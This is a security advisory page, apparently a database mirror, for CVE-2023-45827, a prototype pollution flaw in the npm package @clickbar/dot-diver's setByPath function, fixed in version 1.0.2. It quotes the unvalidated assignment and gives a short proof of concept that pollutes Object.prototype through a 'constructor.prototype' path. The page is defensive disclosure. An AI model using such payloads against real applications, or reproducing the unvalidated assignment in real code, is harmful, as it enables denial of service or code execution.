GHSA-9W5F-MW3P-PJ47

Vulnerability from github – Published: 2023-11-03 19:03 – Updated: 2023-11-06 19:34
VLAI
Summary
Prototype Pollution(PP) vulnerability in setByPath
Details

Summary

There is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE.

Details

//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277

// eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
  objectToSet[lastKey] = value

In this code, there is no validation for Prototpye Pollution.

PoC

import { getByPath, setByPath } from '@clickbar/dot-diver'

console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo

Impact

It is Prototype Pollution(PP) and it can leads to Dos, RCE, etc.

Credits

Team : NodeBoB

최지혁 ( Jihyeok Choi )

이동하 ( Lee Dong Ha of ZeroPointer Lab )

강성현    ( kang seonghyeun )

박성진    ( sungjin park )

김찬호    ( Chanho Kim )

이수영    ( Lee Su Young )

김민욱    ( MinUk Kim )

Severity
7.3 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@clickbar/dot-diver"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-45827"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-11-03T19:03:40Z",
    "nvd_published_at": "2023-11-06T18:15:08Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThere is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE.\n\n### Details\n```javascript\n//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277\n\n// eslint-disable-next-line @typescript-eslint/no-unsafe-member-access\n  objectToSet[lastKey] = value\n```\nIn this code, there is no validation for Prototpye Pollution.\n\n### PoC\n```javascript\nimport { getByPath, setByPath } from \u0027@clickbar/dot-diver\u0027\n\nconsole.log({}.polluted); // undefined\nsetByPath({},\u0027constructor.prototype.polluted\u0027, \u0027foo\u0027);\nconsole.log({}.polluted); // foo\n```\n\n### Impact\nIt is Prototype Pollution(PP) and it can leads to Dos, RCE, etc.\n\n### Credits\nTeam : NodeBoB\n\n\ucd5c\uc9c0\ud601   ( Jihyeok Choi )\n\n\uc774\ub3d9\ud558\u2003( Lee Dong Ha of ZeroPointer Lab )\n\n\uac15\uc131\ud604 \u00a0\u00a0\u00a0( kang seonghyeun )\n\n\ubc15\uc131\uc9c4\u00a0\u00a0\u00a0 ( sungjin park )\n\n\uae40\ucc2c\ud638\u00a0\u00a0\u00a0 ( Chanho Kim )\n\n\uc774\uc218\uc601 \u00a0\u00a0\u00a0( Lee Su Young )\n\n\uae40\ubbfc\uc6b1 \u00a0\u00a0\u00a0( MinUk Kim )\n",
  "id": "GHSA-9w5f-mw3p-pj47",
  "modified": "2023-11-06T19:34:19Z",
  "published": "2023-11-03T19:03:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/clickbar/dot-diver/security/advisories/GHSA-9w5f-mw3p-pj47"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45827"
    },
    {
      "type": "WEB",
      "url": "https://github.com/clickbar/dot-diver/commit/9790834cf4c2bca75db00e588e58056dacaf602f"
    },
    {
      "type": "WEB",
      "url": "https://github.com/clickbar/dot-diver/commit/98daf567390d816fd378ec998eefe2e97f293d5a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/clickbar/dot-diver"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution(PP) vulnerability in setByPath"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.